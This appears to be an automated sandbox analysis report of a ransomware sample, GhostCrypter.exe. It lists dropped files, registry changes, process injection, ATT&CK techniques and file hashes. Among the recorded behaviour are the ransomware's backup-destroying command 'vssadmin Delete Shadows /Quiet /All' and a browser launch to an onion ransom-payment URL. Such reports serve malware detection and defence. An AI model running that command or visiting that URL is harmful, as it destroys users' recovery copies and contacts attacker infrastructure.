File created	C:\Windows\winsxs\x86_microsoft-windows-l..ultimatee.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_203bbba4ef78364f\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_74b66e05cc4097c8\about_Reserved_Words.help.txt	GhostCrypter.exe
File opened for modification	C:\Windows\ehome\ja-JP\playready_eula.txt	GhostCrypter.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v3.5\SQL\de\DropSqlPersistenceProviderSchema.sql	GhostCrypter.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\default.aspx	GhostCrypter.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\22.png	GhostCrypter.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1868	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a70000000000200000000001066000000010000200000001b894eb600c16f332857d32a5a59460bb171d386d07065ffb0321f706dddbf9d000000000e8000000002000020000000506eff3025c6d89c71cf758ae14ef8386718178ae73b39b6cd6b21abf13ed67f200000006235f2ccfc31faf567ae56d801a45f8fc1ce699d067a03bb58dd7c37560f1fe34000000041185b3125a4fb3b60dc5c63ed3a5bec4f5b3ae478e4d09f7a688d63e132926c11319cae087ed96fa01d0d269ea3191df1554b0b3c7a2abc87b2cd290326cb50	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0cb913edf6cda01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a700000000002000000000010660000000100002000000036b33d1cde55de5845f85d3739e4fd051bbafcad1669b8338079ca59ef490bcb000000000e800000000200002000000068f358baa642bf5c2ddd8e10ca398dcb9c9e6b6d6dc7a1c87aa9c4a20d00d87d90000000019ff898278c6b91508b9edcad233aa65889c6557c3f6ca91d17757583d829e87ff87326ca75bb640974c28ce40ba94f3b72b3cb7476fb3031895bf2b98273b62060316390ecffb76bdbd655b4eb11f3bd754d5d49623e54b7327475f9fda410e30d89d939b37898bc85c0d403a87960bb0be26d6143dfb6fe7e5d1b04410f6deb23554953f0ac31a467400dc9b817f440000000769d580a5ad0bf308b11ec424a2c030d56ad8b0609d2fb999fa669bc77355eefe3111e65bc66123d6311c2abb30cb34b0324365fc4a024e7d3673d5e36fc4658	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{510B31E1-D8D2-11EE-9969-66DD11CD6629} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "415572699"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeBackupPrivilege	1248	vssvc.exe
Token: SeRestorePrivilege	1248	vssvc.exe
Token: SeAuditPrivilege	1248	vssvc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
740	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
740	iexplore.exe
740	iexplore.exe
2176	IEXPLORE.EXE
2176	IEXPLORE.EXE
2176	IEXPLORE.EXE
2176	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2972 wrote to memory of 2336	2972	GhostCrypter.exe	32
PID 2972 wrote to memory of 2336	2972	GhostCrypter.exe	32
PID 2972 wrote to memory of 2336	2972	GhostCrypter.exe	32
PID 2972 wrote to memory of 2336	2972	GhostCrypter.exe	32
PID 2972 wrote to memory of 740	2972	GhostCrypter.exe	34
PID 2972 wrote to memory of 740	2972	GhostCrypter.exe	34
PID 2972 wrote to memory of 740	2972	GhostCrypter.exe	34
PID 2972 wrote to memory of 740	2972	GhostCrypter.exe	34
PID 2336 wrote to memory of 1868	2336	cmd.exe	35
PID 2336 wrote to memory of 1868	2336	cmd.exe	35
PID 2336 wrote to memory of 1868	2336	cmd.exe	35
PID 2336 wrote to memory of 1868	2336	cmd.exe	35
PID 740 wrote to memory of 2176	740	iexplore.exe	38
PID 740 wrote to memory of 2176	740	iexplore.exe	38
PID 740 wrote to memory of 2176	740	iexplore.exe	38
PID 740 wrote to memory of 2176	740	iexplore.exe	38

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Ransomware\GhostCrypter.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\GhostCrypter.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2972
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /Quiet /All
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2336
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin Delete Shadows /Quiet /All
    3⤵
    - Interacts with shadow copies
    PID:1868
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://idxcgov7x3dl552g.onion.link/vict?cust=8075ffe0db3cded725bdb4f67cc450bb834965a6&guid=ad04ce47-83ca-4cca-a79e-77cdc80ce41e&ever=2016-04-04_2&wver=0601b11d4336&fc=4008
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:740
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:740 CREDAT:275457 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2176

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\Microsoft Shared\ink\readme_liesmich_encryptor_raas.txt

Filesize
1KB

MD5
ce910a3e445a752fd30f7e85e1ab7738

SHA1
f6c9beba56aca1f75f9d97ca1db6e727acffc01a

SHA256
3ff2f57e8fa2fdca0a0070fd87c98b03bd73793a6f77b95768a5e2dcd11570a4

SHA512
c239f4ec9632924fe06acfd839629606a100a3df52c554a22a3f7fa8041fa90bb1f7beff6a193b9a3c42c11d6019da7810864267432e4bf9ff740841c9ec0154

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5403591d2f6f2479ed8ec43ca9ae1468

SHA1
181c47d6d3f62cad70104921ee9dac506c756359

SHA256
5408028382dae30785a53aceb74b3e7e1bf60e7d3142f1a1cfa62848ff00229e

SHA512
63a16b1fd414e597443e66ab6313826801bc75171756a77b21da9eab6e4eeb655eda447cc37b870d950b76f84a1724b1433bf9861a0aac5f78803134bfcdb265

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f706f0e128412885b75019dacd34d00d

SHA1
c12dd0332403f77c2a97d093305800b80a0bb38f

SHA256
0bd2ed320cd14f85a3e73d1dcad9bb70dd47eaf3adeb8f174fa81a06c0f5b2c0

SHA512
38ad7048a0f8d1653e14be5a002748ca303542c6eb368972043b62ad0a55869626bc8f2d3b561093b67b1b94f711f22f1226239287f6521faeee4c62a7a4fa38

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
fbefbcbf9177e2fa34f96637d3c13d5a

SHA1
10f9c13a0645b6293be223a52b592583566925dd

SHA256
91aab2b121c74b1383bbaa724a8bbdeecbaa07208838fb3abfb69af646a0376b

SHA512
07407580e739efe749c1cf8539d7b3aaf4b44280df7890b4a2b8dba82254b1343042902dce4ca82d9028c0926d4c022e566fa9f635c7d1d84b2bbe6dfb85b3a3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ee404f1ee9a9358c6ee2fe3cea451a5b

SHA1
c207bbaf7334ba9706905058a4a2157dab228dc4

SHA256
e9e2e2aaee644c5b7dcb69ab4f369a306a4563e79b5c052b9985807c60b30ed9

SHA512
338aa5f256e2308fb3e11a26cccce070dd0d58ec92ec1d9885150894ff3863fa58be089d3d1e5db70ca5911f11c5000fea5baaf9551083bb11ebf00cb3aca5ce

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b9ffae5c20be4f548885a195799753b1

SHA1
0a8fd4607a6e5402e6a11981bad975fb8199ae06

SHA256
87a282df16235a8a7b71654dd44873bd04a65158f3f2f0db0ebec78259d92ad5

SHA512
de9d6e14e5cd245cf77900d62cd75a5f41a5021b57cc96e1e05640cc32356b6cd25e118d8c734cbef6610c2d48d9e1129b5e77f27ea02e0cb0e9a2ac5cac51e4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7386ed05190bd59374dbd59ad6c080f6

SHA1
c02d536a171b339c0861d62f690787fde1133fbc

SHA256
ef9ea02ee7249af50ca1aeca8b289b2c905de4405d4a3ce720c2fbde00bf85af

SHA512
1c9d252c8277ec5333bcc1784f3c54d76d49fea7b14762ffe584b990c4a720bee25a6cb225ce296b58f7bfdfb4b28820a5938062382cc27cd1f5342d85be40ff

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d42e6b892d624c4ee99d288400a2f789

SHA1
49c08a60bb31507a919c0dfb5ccbe335077ab92f

SHA256
f39282317e00d5261e355ee9e8f77a08fcc7548b4c985ea909abdba4f9b54641

SHA512
197d61984c7f069b0828ce97637f45d294ba8fe293410fc26f7a539d1d244485557f21029aafe7a5c693ab4387d59db65ef11a1b4c55b999220f28a96f372869

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5ba47e99654e2afb3a0f240733891741

SHA1
04c578f3fecbc4069a10a75f8e0d17a5fbe823e4

SHA256
d2eba6a4f6c27f68fecd1f6eee8e1ca86d2edc92967bb6ca37a185ecc3785ecf

SHA512
f4e617d33aee4a642c56634b1c3f19e8d88a7bdf7c76725105486cccdf70d9022c1c75207fb08949c0425e5500e33061033ba77be6a7224b4cd9623d6265ce2d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e4ad5798052acbf51a9628b8a5cb6b42

SHA1
3bed5ad3c68ea70bc88d0f4dcb10d2031fddb4e6

SHA256
0042a5b354f4bfc286bf6b6a311b04e645c4cab26c4731f41b9d893ad18c4be9

SHA512
9ce9eaec30c689b131f39e37dd86aa7526dcc6dead26c7b35b5ff4b512bafd3299e2d8acb15962d68398138ec5fbc890817ddebb4420ec477fa78ad7b4475002

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
31322ca01b658855ae898442fa578221

SHA1
9a2a8b204ac182ec7205f5cf396d5b45f8cdb38b

SHA256
5a1d8d11c9ba445b2105b01856fe95cd9312a22657beba9cf10d46ea3a26a4fb

SHA512
617e30b43da2ca7960cecfab147afb73d41dc6be28704399aca9d0379c0f373255b90f0a04d9f552fe3c139f7d5a1b994071e0113aaed5d5e28d2a2d587e8f46

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8245095eb473b2ec9b94cd9f78b90477

SHA1
45973eba46c0619e39106b71dac045eb81f2b684

SHA256
de595349d5f5b80f64571410e654b998d49ddc870e73307c7b6254676b246211

SHA512
eb96421ab362fdf6eb898116afcadf4312a30b593618ecee709b853e6070a60639ddbfd32355fcec6b9078e58a4e43ed4df09efed5a5828b32514b2e5c3a749e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d49f591c27fae1685534b37945540a00

SHA1
c2e18d466837eed1048aec89a9779b0d9427f49f

SHA256
7d3223fbfa62538ac7f4e641fd188c7a7704ecdd3b7811494493a2c7c3976f37

SHA512
d53c6c5a544af4448aa603d9418e33b3d5c1c09a96850295492a366833bc526eab80c24704111a3b0e14b261c42aa0d0297e3047bad4feb9c828f87b0eef3465

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
751a6186391d8d5c43b2ad8bdfd5f299

SHA1
14f01f6945bc7f2f8e475b6902cd689b0484c28b

SHA256
d3e99641824d4e7886b42fabf042c3a4725bf6af57445362840947774515d5d7

SHA512
19c7b2bd08b505c120c946bfac24355715afd38eb2b123412f2692c3cdac54879882f2db4ae411f81ea0c71302c3737cb4290c7fa6033e34df283afb68d6fe7e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1e82c09996e2181c43445a486c3e8cae

SHA1
f23064195fc5f85e6aa7193148eed8f2f2afc923

SHA256
ff547f2f969b7fead659df791c8f0a56f03bf6ee9d5e2c2d166b8d9f40bd256a

SHA512
2644a08f26d180dfcdbf9262afd7ba987c1d9dbcbc1b2c117708508fb0bc48e4a23398423d28f968f08e93eee53ee32377229c6f64495294cc0f45250e89a9fa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a6577a37b0b3256b65e546e422d6fc66

SHA1
7ee70cb1033a1b49bcb5d7e2283ed15149c5a91f

SHA256
10e68af588b838a4c1b697652f365ad578ade014d760596e529f6c3fb982791b

SHA512
12f2f2cd0bc2c0ed5a6020b7d6003b19aad6207e3ada1270fab99454c16db246eb50ff1a630d467f50e3ea938688f661f97d310691a21f0ea8be0036113576b6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
66059de2eb7e5ddda077b365ca341efa

SHA1
d2a47b2cd78e6427c2eadd6303dceab2d8bb71b1

SHA256
89d4143fdab61080076bdf1d4b7ce6c6c7c15be0073b5b5529ba8a7a8f1620ab

SHA512
ca2d2a8c18bf3a5bf5967fa9c77a0e944846de0d9b1de1448b80e64a17fd5dfc1c34d24ce9a8d5454fdf388be985eca65d3babba2ae8c807ca18f40bfa8ab126

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b5a4dac59047f63959a876c10910896d

SHA1
c4db1fd59034b1e67d76da20562afa55a91e4be7

SHA256
3c1ad1b7502bf0eb624e38e36bcdd65567b8ea5b31d8de0c92c929676130d0e3

SHA512
c6e5851e1f1066c6bfbbade4d48e8683802d33701be0effb746fa1255856ceadd30cdf1809cd6edb4ae3018c5662e674fc9450f4deb3790700aa1ee216c1de24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JB8Q1DZR\favicon[1].ico

Filesize
4KB

MD5
6f6074198c0cb321bbd4e52b112e3dc8

SHA1
c521c24efd1c791596855f287b1360833d16c88b

SHA256
51f592b7154df28e7380cc2ea48dccc83cd867a99e242d217cb6fe98c73c2cb0

SHA512
aa1823a357ba7fca33e59a549e3579f2031c364c8e4d1ee6b8e078e556a5081069e629bfb9ed2e9642bff14e99bfe756fa7b9e10022ad5f8a8ffef5ace7ab35c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9FE9.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA115.tmp

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA129.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
memory/2972-2715-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/2972-609-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/2972-100-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/2972-4012-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/2972-4620-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads